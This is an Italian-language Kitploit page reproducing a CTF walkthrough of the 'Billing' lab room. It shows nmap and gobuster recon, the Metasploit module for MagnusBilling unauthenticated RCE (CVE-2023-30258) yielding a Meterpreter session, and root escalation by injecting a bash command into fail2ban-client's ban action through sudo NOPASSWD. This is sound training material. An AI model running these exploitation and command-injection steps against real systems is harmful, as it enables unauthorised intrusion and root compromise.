Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Room-Walkthrough-Billing — Una guida dettagliata dello sfruttamento di Billing room tramite CVE-2023-30258 e dell'escalation tramite configurazione errata di fail2ban | Kitploit
Strumenti/GitHubGitHub/adityabhatt3010/room-walkthrough-billing
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubadityabhatt3010/room-walkthrough-billing

Room-Walkthrough-Billing

Una guida dettagliata dello sfruttamento di Billing room tramite CVE-2023-30258 e dell'escalation tramite configurazione errata di fail2ban

Vedi Repository
141 mese faNon ancora revisionato

🧠 Walkthrough della Stanza: Billing

Scritto da: Aditya Bhatt | Contributore Open Source


📦 Panoramica

In questo walkthrough, ci immergiamo completamente nella Stanza Billing, mostrando un'istanza vulnerabile di MagnusBilling, un succulento RCE non autenticato (CVE-2023-30258), e una misconfigurazione sudo di fail2ban che grida “rootami”.

Questa stanza combina magnificamente lo sfruttamento automatizzato con l'escalation creativa dei privilegi, offrendoci un assaggio pratico di difetti reali nascosti nel software di fatturazione VoIP. Andremo dalla Ricognizione Iniziale alla Root Shell con PoC completo, commenti e vibe 🗿.


🌐 Fase 1: Enumerazione

🏁 Atterraggio Iniziale

Dopo aver distribuito la macchina, la prima cosa che ti colpisce come un firewall mal configurato:

root@kitploit:~
http://<machine_IP>/mbilling/

Questa è la pagina di login di MagnusBilling. Questo da solo fa scattare campanelli d'allarme — sai che ti aspetta un bel gioco di CVE.

Site


🔍 Nmap Ricognizione Approfondita + Gobuster

Iniziamo con la combo di ricognizione definitiva:

root@kitploit:~
nmap -A -sV -p- 10.10.115.173

🧠 Risultati:

  • Porta 5038 – Asterisk Call Manager/2.10.6
  • Altri servizi HTTP sono disponibili sotto /mbilling/

Successivamente, andiamo a tutto brute con Gobuster:

root@kitploit:~
gobuster dir -u http://10.10.115.173/mbilling -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt
gobuster dir -u http://10.10.115.173/ -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php,.html,.txt

🧠 Risultati:

  • robots.txt

Robots

🏗️ robots.txt

Poi controlliamo il robots.txt del sito per qualcosa di piccante:

root@kitploit:~
User-agent: *
Disallow: /mbilling/

Hmm… cercare di nasconderlo ci fa solo desiderare di più 😈

Robots


🔌 Fase 2: Sfruttamento

🔥 Porta 5038 – Asterisk Manager

Un rapido test con netcat conferma che risponde con:

root@kitploit:~
Response: Error
Message: Missing action in request

Il che conferma ulteriormente: il backend è MagnusBilling, e la porta è collegata ad Asterisk Call Manager. È ora di evocare le nostre arti oscure 🧙

5038


⚔️ Arma Scelta: CVE-2023-30258

Exploit: Esecuzione di codice remoto non autenticata in MagnusBilling Modulo: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

Avvia Metasploit:

root@kitploit:~
msfconsole
use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258

msf_1

Poi controlla i requisiti:

root@kitploit:~
show options

msf_2

Poi imposta quanto segue:

root@kitploit:~
set RHOSTS 10.10.115.173
set LHOST 10.17.88.138
run

msf_3
msf_4

Pochi secondi dopo… Boom. Abbiamo ottenuto una sessione Meterpreter!

root@kitploit:~
shell
whoami ➤ asterisk
uname -a ➤ Linux Debian 6.1 x86_64

Provato a generare una shell TTY:

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

msf_5_1


🧭 Fase 3: Enumerazione Utente

Iniziamo a salire con:

root@kitploit:~
cd ..
cd ..

msf_5_2

Finché non troviamo:

root@kitploit:~
cd /home/magnus
cat user.txt

msf_6

Bello! Ma non abbiamo finito. Ci serve root, e Magnus ci sta sussurrando segreti.


🧨 Fase 4: Escalation dei Privilegi

Controlliamo cosa possiamo eseguire con sudo:

root@kitploit:~
sudo -l

Risultato:

root@kitploit:~
(ALL) NOPASSWD: /usr/bin/fail2ban-client

Ora questo è 🔥. Possiamo abusare di fail2ban-client per eseguire comandi come root usando le azioni di ban.


🎯 Abuso di Fail2Ban → Shell Root

Riavvia fail2ban:

root@kitploit:~
sudo /usr/bin/fail2ban-client restart

Poi inietta il comando per rubare la flag di root:

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cat /root/root.txt > /tmp/root.txt && chmod 777 /tmp/root.txt'"

Attiva il ban (e quindi il comando):

root@kitploit:~
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1

Poi:

root@kitploit:~
cat /tmp/root.txt

msf_7

Rootato. Come. Un. Boss. 🗿🔥


✅ Tabella Riassuntiva Finale


🧠 Cosa hai imparato (a.k.a. Saggezza Semi-Professionista)

  1. 🔍 La ricognizione non è solo scansione – Cerca pagine nascoste, controlla robots.txt e scava nelle porte strane.
  2. 💣 Sfrutta le CVE note – MagnusBilling era vulnerabile a un exploit pubblico (CVE-2023-30258).
  3. 🔓 L'escalation dei privilegi non significa sempre exploit del kernel – I diritti sudo mal configurati (come su fail2ban-client) sono altrettanto pericolosi.
  4. ⚙️ La creatività conta – Eludere le restrizioni dell'utente con le azioni di ban mostra un pensiero laterale reale.

🗿 Parole Finali

Questa macchina è stato un bellissimo equilibrio tra sfruttamento automatizzato e creatività manuale post-sfruttamento. Dall'RCE di MagnusBilling al rooting via fail2ban, colpisce tutte le note giuste per la playlist di un pentester 🎧🎯

Che tu sia un principiante che cerca di migliorare o un guerriero esperto che colleziona flag — questa è una must-pwn.

Alla prossima volta, Rimani Pericoloso. Rimani Curioso. Rimani Maestoso. 🗿


Scarica lo strumento
🔎 Fase💥 Azione/Strumento Usato
Accesso InizialeScoperto il portale /mbilling e la porta 5038 usando Nmap + Gobuster
Scoperta RicognizioneMagnusBilling CMS + Asterisk Call Manager
SfruttamentoCVE-2023-30258 via Metasploit → shell Meterpreter
EnumerazioneTrovato /home/magnus/user.txt
Escalation dei PrivilegiAbusato fail2ban-client sudo NOPASSWD → RCE come root
Flag RootRecuperato /root/root.txt tramite iniezione payload fail2ban